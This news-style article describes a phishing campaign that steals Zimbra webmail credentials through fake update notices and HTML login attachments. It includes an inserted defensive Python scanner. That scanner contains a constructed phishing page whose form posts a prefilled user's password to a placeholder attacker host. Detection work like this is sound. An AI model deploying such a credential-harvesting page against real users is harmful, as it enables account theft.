Zimbra Collaboration Tool Users Fall Victim to Account Theft

A new phishing campaign targeting users of Zimbra Collaboration email servers has been identified by researchers, and it appears to be quite successful in tricking victims into revealing their login credentials.

Zimbra Collaboration is an online collaborative suite that includes an email server and a web client. The phishing campaign began in April 2023, with cybercriminals sending phishing emails to random victims in an attempt to steal login credentials for the service.

In these phishing emails, the attackers impersonate the victim organization’s administrator and inform the recipient that their email server is scheduled for an update. The email claims that this update could lead to inbox inaccessibility or even termination. To prevent this, the victim is instructed to open an HTML attachment for further instructions.

The attachment, however, does not contain any instructions. Instead, it presents a fake Zimbra login page with the victim’s username prefilled. If the user enters their password, it is sent to the attacker’s server via an HTTPS POST request.
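The pattern described above, an HTML attachment that renders a login form with the recipient's address prefilled and submits the password to a host the organization does not own, is easy to check for mechanically. The following scanner is an added example, not code from the original article or from Zimbra: it parses an attachment with Python's standard-library HTML parser, finds any form containing a password field, and flags it when the form's action points off-domain or when a username field arrives prefilled. The two samples and all hostnames (`corp.example`, `collector.attacker.example`) are constructed placeholders, and the set of trusted webmail hosts is an assumed input that a deployment would supply.

```python
"""Heuristic scanner for credential-harvesting HTML email attachments.

Illustrative only: the samples below are constructed and the hostnames are
placeholders, not real infrastructure.
"""
from dataclasses import dataclass
from html.parser import HTMLParser
from typing import List, Optional, Set
from urllib.parse import urlparse


@dataclass
class FormInfo:
    action: str = ""
    method: str = "get"
    has_password: bool = False
    prefilled_user: Optional[str] = None


class LoginFormParser(HTMLParser):
    """Collects every <form> and the credential-related <input>s inside it."""

    def __init__(self) -> None:
        super().__init__()
        self.forms: List[FormInfo] = []
        self._current: Optional[FormInfo] = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # HTMLParser already lowercases attribute names
        if tag == "form":
            self._current = FormInfo(
                action=a.get("action") or "",
                method=(a.get("method") or "get").lower(),
            )
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            itype = (a.get("type") or "text").lower()
            name = (a.get("name") or "").lower()
            if itype == "password":
                self._current.has_password = True
            elif itype in ("text", "email") and any(
                k in name for k in ("user", "login", "email", "account")
            ):
                if a.get("value"):
                    self._current.prefilled_user = a["value"]

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def scan_attachment(html: str, trusted_hosts: Set[str]) -> List[str]:
    """Return human-readable findings; an empty list means nothing matched.

    trusted_hosts: hostnames the organization's real webmail is served from
    (an assumed input for this example).
    """
    parser = LoginFormParser()
    parser.feed(html)
    parser.close()
    findings: List[str] = []
    for form in parser.forms:
        if not form.has_password:
            continue  # not a login form
        host = (urlparse(form.action).hostname or "").lower()
        # A relative action in a locally opened attachment leads nowhere useful,
        # so only an absolute URL to an untrusted host counts as an exfil path.
        if host and host not in trusted_hosts:
            findings.append(
                f"password form submits via {form.method.upper()} to untrusted host {host}"
            )
        if form.prefilled_user:
            findings.append(f"username prefilled as {form.prefilled_user!r}")
    return findings


# Constructed sample mirroring the described attachment (placeholder hosts).
PHISH_SAMPLE = """
<html><body>
<h2>Web Client</h2>
<form action="https://collector.attacker.example/submit" method="post">
  <input type="text" name="username" value="jdoe@corp.example">
  <input type="password" name="password">
  <input type="submit" value="Sign In">
</form>
</body></html>
"""

# Constructed benign sample: a plain maintenance notice with no form at all.
NOTICE_SAMPLE = """
<html><body><p>The mail server will be updated on Saturday. No action needed.</p></body></html>
"""

TRUSTED = {"mail.corp.example"}  # assumed list of legitimate webmail hosts

if __name__ == "__main__":
    for label, sample in (("phish", PHISH_SAMPLE), ("notice", NOTICE_SAMPLE)):
        print(label, "->", scan_attachment(sample, TRUSTED) or "clean")
```

Running the block prints two findings for the constructed phishing sample (off-domain POST target and prefilled username) and `clean` for the notice. The host check is the decisive signal; the prefill check is a weaker corroborating one, which is why the two are reported separately rather than folded into a single score.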

In some instances, the attackers have also been using previously compromised admin accounts to create new accounts on Zimbra servers for the purpose of distributing these phishing emails. While the campaign’s tactics are not considered sophisticated, its success rate has been notable.

Zimbra Collaboration email servers have been frequently targeted by cybercriminals for various purposes. Some attackers use them for cyber espionage, gaining access to internal company communications. Others use these servers as an initial point of entry to move laterally within the target network.

In the past, Zimbra servers have been targeted in high-profile attacks. For example, a Russian threat actor exploited a vulnerability in Zimbra software to monitor emails from organizations linked to NATO, governments, diplomats, and military personnel. Additionally, a zero-day vulnerability in Zimbra was abused in a separate attack, compromising hundreds of servers.

Users and organizations are advised to remain vigilant against phishing attempts, keep software up to date, and follow best practices for email security to protect against such threats.